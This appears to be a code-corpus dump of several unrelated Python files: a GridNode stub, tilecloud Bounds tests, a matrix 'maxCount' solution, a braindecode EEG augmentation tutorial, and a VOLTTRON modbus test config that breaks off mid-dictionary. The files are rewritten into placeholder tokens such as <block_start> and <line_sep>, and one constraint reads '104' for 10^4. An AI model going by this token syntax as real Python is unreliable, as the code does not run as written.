<class_stmt>GridNode(object)<block_start>""" A structure that represents a particular location in (U,V) from a grid. GridNode(uIndex: int,vIndex: int) """<line_sep>@staticmethod<def_stmt>__new__ self uIndex vIndex<block_start>""" __new__[GridNode]() -> GridNode __new__(cls: type,uIndex: int,vIndex: int) """<line_sep><pass><block_end>UIndex=property(<lambda>self:object() <lambda>self v:<none> <lambda>self:<none>)<line_sep>"""The node's index along the U axis. Get: UIndex(self: GridNode) -> int Set: UIndex(self: GridNode)=value """<line_sep>VIndex=property(<lambda>self:object() <lambda>self v:<none> <lambda>self:<none>)<line_sep>"""The node's index along the V axis. Get: VIndex(self: GridNode) -> int Set: VIndex(self: GridNode)=value """<block_end>
<import_stmt>unittest<import_from_stmt>tilecloud Bounds<class_stmt>TestBounds(unittest.TestCase)<block_start><def_stmt>test_empty self<arrow><none><block_start>bounds=Bounds()<assert_stmt>len(bounds)<eq>0<assert_stmt>1<not><in>bounds<line_sep>self.assertRaises(StopIteration next iter(bounds))<assert_stmt>bounds<eq>bounds<block_end><def_stmt>test_init_one_argument self<arrow><none><block_start>bounds=Bounds(1)<assert_stmt>list(bounds)<eq>[1]<block_end><def_stmt>test_init_two_arguments self<arrow><none><block_start>bounds=Bounds(1 3)<assert_stmt>list(bounds)<eq>[1 2]<block_end><def_stmt>test_add self<arrow><none><block_start>bounds=Bounds()<assert_stmt>len(bounds)<eq>0<line_sep>bounds.add(1)<assert_stmt>list(bounds)<eq>[1]<line_sep>bounds.add(1)<assert_stmt>list(bounds)<eq>[1]<line_sep>bounds.add(2)<assert_stmt>list(bounds)<eq>[1 2]<block_end><def_stmt>test_update self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds(3 5)<line_sep>self.assertTrue(bounds1.update(bounds2)<is>bounds1)<line_sep>self.assertEqual(len(bounds1) 4)<line_sep>self.assertEqual(list(bounds1) [1 2 3 4])<block_end><def_stmt>test_update_empty self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds(3 5)<assert_stmt>bounds1.update(bounds2)<is>bounds1<assert_stmt>list(bounds1)<eq>[3 4]<block_end><def_stmt>test_union_empty_empty self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds()<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>len(bounds3)<eq>0<block_end><def_stmt>test_union_empty_normal self<arrow><none><block_start>bounds1=Bounds()<line_sep>bounds2=Bounds(3 5)<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[3 4]<block_end><def_stmt>test_union_normal_empty self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds()<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[1 2]<block_end><def_stmt>test_union_normal_normal self<arrow><none><block_start>bounds1=Bounds(1 3)<line_sep>bounds2=Bounds(3 5)<line_sep>bounds3=bounds1.union(bounds2)<assert_stmt>bounds3<is><not>bounds1<assert_stmt>bounds3<is><not>bounds2<assert_stmt>list(bounds3)<eq>[1 2 3 4]<block_end><block_end>
""" You are given an m x n matrix M initialized with all 0's and an array of operations ops, where ops[i] = [ai, bi] means M[x][y] should be incremented by one for all 0 <= x < ai and 0 <= y < bi. Count and return the number of maximum integers in the matrix after performing all the operations.   Example 1: Input: m = 3, n = 3, ops = [[2,2],[3,3]] Output: 4 Explanation: The maximum integer in M is 2, and there are four of it in M. So return 4. Example 2: Input: m = 3, n = 3, ops = [[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3],[2,2],[3,3],[3,3],[3,3]] Output: 4 Example 3: Input: m = 3, n = 3, ops = [] Output: 9   Constraints: 1 <= m, n <= 4 * 104 1 <= ops.length <= 104 ops[i].length == 2 1 <= ai <= m 1 <= bi <= n """<class_stmt>Solution(object)<block_start><def_stmt>maxCount self m n ops<block_start>""" :type m: int :type n: int :type ops: List[List[int]] :rtype: int """<line_sep>my,mx=m n<for_stmt>op ops<block_start>my=min(my op[0])<line_sep>mx=min(mx op[1])<block_end><return>my<times>mx<block_end><block_end>
""" Data Augmentation on BCIC IV 2a Dataset ======================================= This tutorial shows how to train EEG deep models with data augmentation. It follows the trial-wise decoding example and also illustrates the effect of a transform on the input signals. .. contents:: This example covers: :local: :depth: 2 """<line_sep># Authors: <NAME> <<EMAIL>> # <NAME> <<EMAIL>> # # License: BSD (3-clause) ###################################################################### # Loading and preprocessing the dataset # ------------------------------------- ###################################################################### # Loading # ~~~~~~~ # <import_from_stmt>braindecode EEGClassifier<import_from_stmt>skorch.helper predefined_split<import_from_stmt>skorch.callbacks LRScheduler<import_from_stmt>braindecode.datasets MOABBDataset<line_sep>subject_id=3<line_sep>dataset=MOABBDataset(dataset_name="BNCI2014001" subject_ids=[subject_id])<line_sep>###################################################################### # Preprocessing # ~~~~~~~~~~~~~ # <import_from_stmt>braindecode.preprocessing exponential_moving_standardize preprocess Preprocessor scale <line_sep>low_cut_hz=4.# low cut frequency for filtering high_cut_hz=38.# high cut frequency for filtering # Parameters for exponential moving standardization factor_new=1e-3<line_sep>init_block_size=1000<line_sep>preprocessors=[Preprocessor('pick_types' eeg=<true> meg=<false> stim=<false>) # Keep EEG sensors Preprocessor(scale factor=1e6 apply_on_array=<true>) # Convert from V to uV Preprocessor('filter' l_freq=low_cut_hz h_freq=high_cut_hz) # Bandpass filter Preprocessor(exponential_moving_standardize # Exponential moving standardization factor_new=factor_new init_block_size=init_block_size)]<line_sep>preprocess(dataset preprocessors)<line_sep>###################################################################### # Extracting windows # ~~~~~~~~~~~~~~~~~~ # <import_from_stmt>braindecode.preprocessing create_windows_from_events<line_sep>trial_start_offset_seconds=-0.5<line_sep># Extract sampling frequency, check that they are same in all datasets sfreq=dataset.datasets[0].raw.info['sfreq']<assert_stmt>all([ds.raw.info['sfreq']<eq>sfreq<for>ds dataset.datasets])<line_sep># Calculate the trial start offset in samples. trial_start_offset_samples=int(trial_start_offset_seconds<times>sfreq)<line_sep># Create windows using braindecode function for this. It needs parameters to # define how trials should be used. windows_dataset=create_windows_from_events(dataset trial_start_offset_samples=trial_start_offset_samples trial_stop_offset_samples=0 preload=<true> )<line_sep>###################################################################### # Split dataset into train and valid # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # splitted=windows_dataset.split('session')<line_sep>train_set=splitted['session_T']<line_sep>valid_set=splitted['session_E']<line_sep>###################################################################### # Defining a Transform # -------------------- # ###################################################################### # Data can be manipulated by transforms, which are callable objects. A # transform is usually handled by a custom data loader, but can also be called # directly on input data, as demonstrated below for illutrative purposes. # # First, we need to define a Transform. Here we chose the FrequencyShift, which # randomly translates all frequencies within a given range. <import_from_stmt>braindecode.augmentation FrequencyShift<line_sep>transform=FrequencyShift(probability=1. # defines the probability of actually modifying the input sfreq=sfreq max_delta_freq=2.# the frequency shifts are sampled now between -2 and 2 Hz )<line_sep>###################################################################### # Manipulating one session and visualizing the transformed data # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Next, let us augment one session to show the resulting frequency shift. The # data of an mne Epoch is used here to make usage of mne functions. <import_stmt>torch<line_sep>epochs=train_set.datasets[0].windows# original epochs X=epochs.get_data()<line_sep># This allows to apply the transform with a fixed shift (10 Hz) for # visualization instead of sampling the shift randomly between -2 and 2 Hz X_tr,_=transform.operation(torch.as_tensor(X).float() <none> 10. sfreq)<line_sep>###################################################################### # The psd of the transformed session has now been shifted by 10 Hz, as one can # see on the psd plot. <import_stmt>mne<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<def_stmt>plot_psd data axis label color<block_start>psds,freqs=mne.time_frequency.psd_array_multitaper(data sfreq=sfreq fmin=0.1 fmax=100)<line_sep>psds=10.<times>np.log10(psds)<line_sep>psds_mean=psds.mean(0).mean(0)<line_sep>axis.plot(freqs psds_mean color=color label=label)<block_end>_,ax=plt.subplots()<line_sep>plot_psd(X ax 'original' 'k')<line_sep>plot_psd(X_tr.numpy() ax 'shifted' 'r')<line_sep>ax.set(title='Multitaper PSD (gradiometers)' xlabel='Frequency (Hz)' ylabel='Power Spectral Density (dB)')<line_sep>ax.legend()<line_sep>plt.show()<line_sep>###################################################################### # Training a model with data augmentation # --------------------------------------- # # Now that we know how to instantiate ``Transforms``, it is time to learn how # to use them to train a model and try to improve its generalization power. # Let's first create a model. # # Create model # ~~~~~~~~~~~~ # ###################################################################### # The model to be trained is defined as usual. <import_from_stmt>braindecode.util set_random_seeds<import_from_stmt>braindecode.models ShallowFBCSPNet<line_sep>cuda=torch.cuda.is_available()# check if GPU is available, if True chooses to use it device='cuda'<if>cuda<else>'cpu'<if_stmt>cuda<block_start>torch.backends.cudnn.benchmark=<true><block_end># Set random seed to be able to reproduce results seed=20200220<line_sep>set_random_seeds(seed=seed cuda=cuda)<line_sep>n_classes=4<line_sep># Extract number of chans and time steps from dataset n_channels=train_set[0][0].shape[0]<line_sep>input_window_samples=train_set[0][0].shape[1]<line_sep>model=ShallowFBCSPNet(n_channels n_classes input_window_samples=input_window_samples final_conv_length='auto' )<line_sep>###################################################################### # Create an EEGClassifier with the desired augmentation # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # ###################################################################### # In order to train with data augmentation, a custom data loader can be # for the training. Multiple transforms can be passed to it and will be applied # sequentially to the batched data within the ``AugmentedDataLoader`` object. <import_from_stmt>braindecode.augmentation AugmentedDataLoader SignFlip<line_sep>freq_shift=FrequencyShift(probability=.5 sfreq=sfreq max_delta_freq=2.# the frequency shifts are sampled now between -2 and 2 Hz )<line_sep>sign_flip=SignFlip(probability=.1)<line_sep>transforms=[freq_shift sign_flip]<line_sep># Send model to GPU <if_stmt>cuda<block_start>model.cuda()<block_end>###################################################################### # The model is now trained as in the trial-wise example. The # ``AugmentedDataLoader`` is used as the train iterator and the list of # transforms are passed as arguments. lr=0.0625<times>0.01<line_sep>weight_decay=0<line_sep>batch_size=64<line_sep>n_epochs=4<line_sep>clf=EEGClassifier(model iterator_train=AugmentedDataLoader # This tells EEGClassifier to use a custom DataLoader iterator_train__transforms=transforms # This sets the augmentations to use criterion=torch.nn.NLLLoss optimizer=torch.optim.AdamW train_split=predefined_split(valid_set) # using valid_set for validation optimizer__lr=lr optimizer__weight_decay=weight_decay batch_size=batch_size callbacks=["accuracy" ("lr_scheduler" LRScheduler('CosineAnnealingLR' T_max=n_epochs-1)) ] device=device )<line_sep># Model training for a specified number of epochs. `y` is None as it is already # supplied in the dataset. clf.fit(train_set y=<none> epochs=n_epochs)<line_sep>###################################################################### # Manually composing Transforms # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # It would be equivalent (although more verbose) to pass to ``EEGClassifier`` a # composition of the same transforms: <import_from_stmt>braindecode.augmentation Compose<line_sep>composed_transforms=Compose(transforms=transforms)<line_sep>###################################################################### # Setting the data augmentation at the Dataset level # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # Also note that it is also possible for most of the transforms to pass them # directly to the WindowsDataset object through the `transform` argument, as # most commonly done in other libraries. However, it is advised to use the # ``AugmentedDataLoader`` as above, as it is compatible with all transforms and # can be more efficient. train_set.transform=composed_transforms<line_sep>
<import_stmt>pytest<import_stmt>gevent<import_stmt>logging<import_stmt>time<import_from_stmt>volttron.platform get_services_core jsonapi<import_from_stmt>volttrontesting.utils.utils get_rand_ip_and_port<import_from_stmt>platform_driver.interfaces.modbus_tk.server Server<import_from_stmt>platform_driver.interfaces.modbus_tk.maps Map Catalog<import_from_stmt>volttron.platform.agent.known_identities PLATFORM_DRIVER<line_sep>logger=logging.getLogger(__name__)<line_sep>IP,_port=get_rand_ip_and_port().split(":")<line_sep>PORT=int(_port)<line_sep># New modbus_tk driver config DRIVER_CONFIG={"driver_config":{"name":"test" "device_address":IP "port":PORT "slave_id":1 "addressing":"offset" "register_map":"config://modbus_tk_map.csv"} "driver_type":"modbus_tk" "registry_config":"config://modbus_tk.csv" "interval":60 "timezone":"UTC"}<line_sep># New modbus_tk csv config REGISTRY_CONFIG_STRING="""Volttron Point Name,Register Name BRAND (),BRAND () MODEL (),MODEL () COMS STATUS (),COMS STATUS () COMS QUALITY (),COMS QUALITY () NUMBER OF QUERIES (),NUMBER OF QUERIES () NUMBER OF FAILS (),NUMBER OF FAILS () DATE LAST ACQUISITION (),DATE LAST ACQUISITION () LAST SAMPLING DURATION (s),LAST SAMPLING DURATION (s) ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh) REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),REAL ENERGY QUADRANTS 1-4 IMPORT (kWh) REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),REAL ENERGY QUADRANTS 2-3 EXPORT (kWh) REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh) REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh) REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh) REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh) APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh) APPARENT QUADRANTS 1-4 IMPORT (kVAh),APPARENT QUADRANTS 1-4 IMPORT (kVAh) APPARENT QUADRANTS 2-3 EXPORT (kVAh),APPARENT QUADRANTS 2-3 EXPORT (kVAh) TOTAL INSTANTANEOUS REAL POWER (kW),TOTAL INSTANTANEOUS REAL POWER (kW) TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),TOTAL INSTANTANEOUS REACTIVE POWER (kVAR) TOTAL INSTANTANEOUS APPARENT POWER (kVA),TOTAL INSTANTANEOUS APPARENT POWER (kVA) TOTAL POWER FACTOR (-),TOTAL POWER FACTOR (-) AVERAGE VOLTAGE L-L (V),AVERAGE VOLTAGE L-L (V) AVERAGE VOLTAGE L-N (V),AVERAGE VOLTAGE L-N (V) AVERAGE CURRENT (A),AVERAGE CURRENT (A) FREQUENCY (Hz),FREQUENCY (Hz) TOTAL REAL POWER PRESENT DEMAND (kW),TOTAL REAL POWER PRESENT DEMAND (kW) TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),TOTAL REACTIVE POWER PRESENT DEMAND (kVAR) TOTAL APPARENT POWER PRESENT DEMAND (kVA),TOTAL APPARENT POWER PRESENT DEMAND (kVA) TOTAL REAL POWER MAX. DEMAND IMPORT (kW),TOTAL REAL POWER MAX. DEMAND IMPORT (kW) TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR) TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA) TOTAL REAL POWER MAX. DEMAND EXPORT (kW),TOTAL REAL POWER MAX. DEMAND EXPORT (kW) TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR) TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA) PULSE COUNTER 1 (-),PULSE COUNTER 1 (-) PULSE COUNTER 2 (-),PULSE COUNTER 2 (-) ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh) ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh) ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh) ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh) ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh) ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh) ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh) ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh) ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh) ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh) ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh) ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh) REAL POWER PHASE A (kW),REAL POWER PHASE A (kW) REAL POWER PHASE B (kW),REAL POWER PHASE B (kW) REAL POWER PHASE C (kW),REAL POWER PHASE C (kW) REACTIVE POWER PHASE A (kVAR),REACTIVE POWER PHASE A (kVAR) REACTIVE POWER PHASE B (kVAR),REACTIVE POWER PHASE B (kVAR) REACTIVE POWER PHASE C (kVAR),REACTIVE POWER PHASE C (kVAR) APPARENT POWER PHASE A (kVA),APPARENT POWER PHASE A (kVA) APPARENT POWER PHASE B (kVA),APPARENT POWER PHASE B (kVA) APPARENT POWER PHASE C (kVA),APPARENT POWER PHASE C (kVA) POWER FACTOR PHASE A (-),POWER FACTOR PHASE A (-) POWER FACTOR PHASE B (-),POWER FACTOR PHASE B (-) POWER FACTOR PHASE C (-),POWER FACTOR PHASE C (-) VOLTAGE PHASE A-B (V),VOLTAGE PHASE A-B (V) VOLTAGE PHASE B-C (V),VOLTAGE PHASE B-C (V) VOLTAGE PHASE A-C (V),VOLTAGE PHASE A-C (V) VOLTAGE PHASE A-N (V),VOLTAGE PHASE A-N (V) VOLTAGE PHASE B-N (V),VOLTAGE PHASE B-N (V) VOLTAGE PHASE C-N (V),VOLTAGE PHASE C-N (V) CURRENT PHASE A (A),CURRENT PHASE A (A) CURRENT PHASE B (A),CURRENT PHASE B (A) CURRENT PHASE C (A),CURRENT PHASE C (A)"""<line_sep>REGISTER_MAP="""Register Name,Address,Type,Units,Writable,Transform,Table,Mixed Endian ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh),399,float,kWh,TRUE,,analog_output_holding_registers,TRUE REAL ENERGY QUADRANTS 1-4 IMPORT (kWh),401,float,kWh,TRUE,,analog_output_holding_registers,TRUE REAL ENERGY QUADRANTS 2-3 EXPORT (kWh),403,float,kWh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh),405,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh),407,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh),409,float,kVARh,TRUE,,analog_output_holding_registers,TRUE REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh),411,float,kVARh,TRUE,,analog_output_holding_registers,TRUE APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh),413,float,kVAh,TRUE,,analog_output_holding_registers,TRUE APPARENT QUADRANTS 1-4 IMPORT (kVAh),415,float,kVAh,TRUE,,analog_output_holding_registers,TRUE APPARENT QUADRANTS 2-3 EXPORT (kVAh),417,float,kVAh,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS REAL POWER (kW),419,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS REACTIVE POWER (kVAR),421,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL INSTANTANEOUS APPARENT POWER (kVA),423,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL POWER FACTOR (-),425,float,,TRUE,,analog_output_holding_registers,TRUE AVERAGE VOLTAGE L-L (V),427,float,V,TRUE,,analog_output_holding_registers,TRUE AVERAGE VOLTAGE L-N (V),429,float,V,TRUE,,analog_output_holding_registers,TRUE AVERAGE CURRENT (A),431,float,A,TRUE,,analog_output_holding_registers,TRUE FREQUENCY (Hz),433,float,Hz,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER PRESENT DEMAND (kW),435,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER PRESENT DEMAND (kVAR),437,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER PRESENT DEMAND (kVA),439,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER MAX. DEMAND IMPORT (kW),441,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER MAX. DEMAND IMPORT (kVAR),443,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER MAX. DEMAND IMPORT (kVA),445,float,kVA,TRUE,,analog_output_holding_registers,TRUE TOTAL REAL POWER MAX. DEMAND EXPORT (kW),447,float,kW,TRUE,,analog_output_holding_registers,TRUE TOTAL REACTIVE POWER MAX. DEMAND EXPORT (kVAR),449,float,kVAR,TRUE,,analog_output_holding_registers,TRUE TOTAL APPARENT POWER MAX. DEMAND EXPORT (kVA),451,float,kVA,TRUE,,analog_output_holding_registers,TRUE PULSE COUNTER 1 (-),453,float,,TRUE,,analog_output_holding_registers,TRUE PULSE COUNTER 2 (-),455,float,,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE A IMPORT (kWh),457,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE B IMPORT (kWh),459,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE C IMPORT (kWh),461,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE A EXPORT (kWh),463,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE B EXPORT (kWh),465,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED REAL ENERGY PHASE C EXPORT (kWh),467,float,kWh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE A IMPORT (kVARh),469,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE B IMPORT (kVARh),471,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q1 REACTIVE ENERGY PHASE C IMPORT (kVARh),473,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE A IMPORT (kVARh),475,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE B IMPORT (kVARh),477,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q2 REACTIVE ENERGY PHASE C IMPORT (kVARh),479,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE A EXPORT (kVARh),481,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE B EXPORT (kVARh),483,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q3 REACTIVE ENERGY PHASE C EXPORT (kVARh),485,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE A EXPORT (kVARh),487,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE B EXPORT (kVARh),489,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED Q4 REACTIVE ENERGY PHASE C EXPORT (kVARh),491,float,kVARh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE A IMPORT (kVAh),493,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE B IMPORT (kVAh),495,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE C IMPORT (kVAh),497,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE A EXPORT (kVAh),499,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE B EXPORT (kVAh),501,float,kVAh,TRUE,,analog_output_holding_registers,TRUE ACCUMULATED APPARENT ENERGY PHASE C EXPORT (kVAh),503,float,kVAh,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE A (kW),505,float,kW,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE B (kW),507,float,kW,TRUE,,analog_output_holding_registers,TRUE REAL POWER PHASE C (kW),509,float,kW,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE A (kVAR),511,float,kVAR,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE B (kVAR),513,float,kVAR,TRUE,,analog_output_holding_registers,TRUE REACTIVE POWER PHASE C (kVAR),515,float,kVAR,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE A (kVA),517,float,kVA,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE B (kVA),519,float,kVA,TRUE,,analog_output_holding_registers,TRUE APPARENT POWER PHASE C (kVA),521,float,kVA,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE A (-),523,float,,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE B (-),525,float,,TRUE,,analog_output_holding_registers,TRUE POWER FACTOR PHASE C (-),527,float,,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-B (V),529,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE B-C (V),531,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-C (V),533,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE A-N (V),535,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE B-N (V),537,float,V,TRUE,,analog_output_holding_registers,TRUE VOLTAGE PHASE C-N (V),539,float,V,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE A (A),541,float,A,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE B (A),543,float,A,TRUE,,analog_output_holding_registers,TRUE CURRENT PHASE C (A),545,float,A,TRUE,,analog_output_holding_registers,TRUE"""<line_sep># Register values dictionary for testing set_point and get_point registers_dict={"ACCUMULATED REAL ENERGY NET (IMPORT-EXPORT) (kWh)":74.0 "REAL ENERGY QUADRANTS 1-4 IMPORT (kWh)":73.0 "REAL ENERGY QUADRANTS 2-3 EXPORT (kWh)":72.0 "REACTIVE ENERGY - QUADRANT 1 IMPORT (kVARh)":71.0 "REACTIVE ENERGY - QUADRANT 2 IMPORT (kVARh)":70.0 "REACTIVE ENERGY - QUADRANT 3 EXPORT (kVARh)":69.0 "REACTIVE ENERGY - QUADRANT 4 EXPORT (kVARh)":68.0 "APPARENT ENERGY NET (IMPORT/EXPORT) (kVAh)":67.0 "APPARENT QUADRANTS 1-4 IMPORT (kVAh)":66.0 "APPARENT QUADRANTS 2-3 EXPORT (kVAh)":65.0 "TOTAL INSTANTANEOUS REAL 